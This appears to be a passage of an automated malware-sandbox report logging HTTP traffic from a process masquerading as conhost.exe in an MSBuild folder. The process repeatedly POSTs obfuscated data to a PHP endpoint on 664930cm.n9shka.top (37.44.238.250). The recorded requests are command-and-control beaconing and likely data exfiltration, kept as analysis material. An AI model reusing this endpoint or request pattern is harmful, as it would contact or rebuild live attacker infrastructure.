                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:03.902724028 CEST | 1120 | OUT | Data Raw: 58 57 5f 55 5c 41 54 5e 5c 58 57 5a 54 5e 55 59 59 54 59 5c 50 50 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XW_U\AT^\XWZT^UYYTY\PPVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",3T")=]0>$(8304V112(2?<!F/'P,=
                                                          Oct 1, 2024 05:58:04.215714931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:04.288882017 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.6 | 49746 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:04.445091009 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:04.793356895 CEST | 1120 | OUT | Data Raw: 58 52 5a 58 5c 44 54 57 5c 58 57 5a 54 53 55 5f 59 56 59 5d 50 51 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZX\DTW\XWZTSU_YVY]PQV@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-0"(]>T%]'=-$8- #$=<&W.$$2[(2$U(9!F/'P,
                                                          Oct 1, 2024 05:58:05.059312105 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:05.194909096 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.6 | 49747 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:05.326306105 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:05.684154987 CEST | 1120 | OUT | Data Raw: 5d 56 5a 5e 59 40 54 50 5c 58 57 5a 54 5c 55 5f 59 55 59 5b 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ^Y@TP\XWZT\U_YUY[PZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^.#R!0]=")\'X>20/U7W$='%>$$&Z>!(T?)!F/'P,
                                                          Oct 1, 2024 05:58:05.936384916 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:06.069905996 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          36 | 192.168.2.6 | 49748 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:06.200678110 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          37 | 192.168.2.6 | 49749 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:06.539853096 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:06.887140989 CEST | 1820 | OUT | Data Raw: 58 5d 5a 5c 59 48 51 56 5c 58 57 5a 54 5f 55 5e 59 55 59 5a 50 59 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]Z\YHQV\XWZT_U^YUYZPYV@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",3?5+;=:'%$(3Y8;S0-+%$$1+!$U+9!F/'P,9
                                                          Oct 1, 2024 05:58:07.128727913 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:07.262018919 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 07 33 0a 0c 1f 21 2f 22 02 2a 2c 23 58 27 34 27 14 2d 3d 2f 18 26 06 23 19 3a 32 0f 05 3f 00 21 00 25 2d 27 5d 32 32 31 0a 27 26 20 5f 0d 10 22 5a 21 16 32 1c 3b 3a 33 5c 3e 31 34 43 32 09 2c 01 27 33 0b 0a 2b 3d 38 1c 26 3c 04 0a 27 3f 31 0d 2f 36 28 10 3e 09 3b 0f 21 2b 2d 56 02 1e 22 53 32 5e 3a 09 22 3c 2a 06 27 5e 28 5d 20 3b 3e 0d 3d 3d 38 11 24 37 3d 04 3d 04 23 11 2b 3c 06 03 22 3a 3d 5f 34 32 3e 0e 33 09 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &3!/"*,#X'4'-=/&#:2?!%-']221'& _"Z!2;:3\>14C2,'3+=8&<'?1/6(>;!+-V"S2^:"<*'^(] ;>==8$7==#+<":=_42>3'\ -Q4ZP


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          38 | 192.168.2.6 | 49750 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:06.670768976 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:07.027745962 CEST | 1120 | OUT | Data Raw: 58 57 5a 5c 5c 45 54 52 5c 58 57 5a 54 52 55 5b 59 52 59 59 50 59 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XWZ\\ETR\XWZTRU[YRYYPYVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"- !;=!%_'12^;\,0#V$=;%!&U1?" T()!F/'P,
                                                          Oct 1, 2024 05:58:07.306022882 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:07.712416887 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P
                                                          Oct 1, 2024 05:58:07.712651968 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 49751 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:07.843995094 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Oct 1, 2024 05:58:08.199726105 CEST | 1120 | OUT | Data Raw: 58 55 5a 5b 59 42 54 50 5c 58 57 5a 54 5c 55 50 59 5a 59 5f 50 5f 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XUZ[YBTP\XWZT\UPYZY_P_VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.07S"+*29]&-.&8(- ?'= S1Q&7:+"$U*9!F/'P,
Oct 1, 2024 05:58:08.450721979 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:08.581130981 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 49752 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:08.702168941 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:09.059089899 CEST | 1120 | OUT | Data Raw: 58 56 5a 59 59 45 51 53 5c 58 57 5a 54 58 55 5c 59 55 59 56 50 5a 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XVZYYEQS\XWZTXU\YUYVPZVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-<!?=^&.&#],373(1)&4-<T()!F/'P,%
Oct 1, 2024 05:58:09.308294058 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:09.467139006 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 49753 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:09.600423098 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:09.949620008 CEST | 1120 | OUT | Data Raw: 58 54 5f 5e 59 48 54 55 5c 58 57 5a 54 5d 55 51 59 5a 59 5f 50 50 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XT_^YHTU\XWZT]UQYZY_PPVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,3<!>)Z3.Z&++,U 0.4P&=%^?"$+9!F/'P,1
Oct 1, 2024 05:58:10.234700918 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:10.371033907 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 49754 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:10.497617006 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:10.860961914 CEST | 1120 | OUT | Data Raw: 5d 56 5a 5f 59 41 54 50 5c 58 57 5a 54 58 55 5b 59 5a 59 5f 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]VZ_YATP\XWZTXU[YZY_P_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#S6<\)&$5&(]-3+T'8%&&9<2()!F/'P,%
Oct 1, 2024 05:58:11.090171099 CEST | 1120 | OUT | Data Raw: 5d 56 5a 5f 59 41 54 50 5c 58 57 5a 54 58 55 5b 59 5a 59 5f 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]VZ_YATP\XWZTXU[YZY_P_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#S6<\)&$5&(]-3+T'8%&&9<2()!F/'P,%
Oct 1, 2024 05:58:11.402621031 CEST | 1120 | OUT | Data Raw: 5d 56 5a 5f 59 41 54 50 5c 58 57 5a 54 58 55 5b 59 5a 59 5f 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]VZ_YATP\XWZTXU[YZY_P_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#S6<\)&$5&(]-3+T'8%&&9<2()!F/'P,%
Oct 1, 2024 05:58:11.716557026 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:11.716583967 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:11.716593027 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:11.968523979 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 49755 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:12.095127106 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 49756 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:12.284267902 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1820
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:12.637193918 CEST | 1820 | OUT | Data Raw: 58 54 5f 5d 59 42 51 52 5c 58 57 5a 54 52 55 5a 59 5a 59 58 50 59 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XT_]YBQR\XWZTRUZYZYXPYVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#+R";=".3.>2;8-0(04%*22<1;+!F/'P,
Oct 1, 2024 05:58:12.893801928 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:13.021226883 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 0e 1d 26 00 24 37 22 56 20 3c 3d 5b 29 3c 20 02 27 37 27 16 3a 13 33 1c 31 3c 28 03 2c 22 39 03 2b 3a 22 5a 32 00 2b 13 25 21 35 0c 30 36 20 5f 0d 10 21 00 21 16 2a 56 38 29 23 5c 3e 21 28 0a 32 0e 3c 04 24 0d 29 0a 2b 07 38 1c 26 2c 29 1f 30 3f 3a 52 2e 25 3f 03 29 34 38 57 23 11 2d 56 02 1e 22 51 26 01 39 54 34 59 25 14 27 16 2c 5f 20 28 26 0f 3e 3e 24 5d 30 34 3e 5c 3d 03 0a 02 3c 2c 34 07 23 2a 0b 5f 34 31 25 1a 33 23 27 5c 20 0d 2d 51 05 34 5a 50
Data Ascii: &$7"V <=[)< '7':31<(,"9+:"Z2+%!506 _!!*V8)#\>!(2<$)+8&,)0?:R.%?)48W#-V"Q&9T4Y%',_ (&>>$]04>\=<,4#*_41%3#'\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 49757 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:12.405754089 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:12.762170076 CEST | 1120 | OUT | Data Raw: 5d 51 5a 59 59 45 54 50 5c 58 57 5a 54 5a 55 5a 59 5a 59 59 50 51 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]QZYYETP\XWZTZUZYZYYPQVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:3 !([>!!\$=61 /3/S37&"=%'.?" +)!F/'P,-
Oct 1, 2024 05:58:13.032345057 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:13.170599937 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 49758 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:13.318944931 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
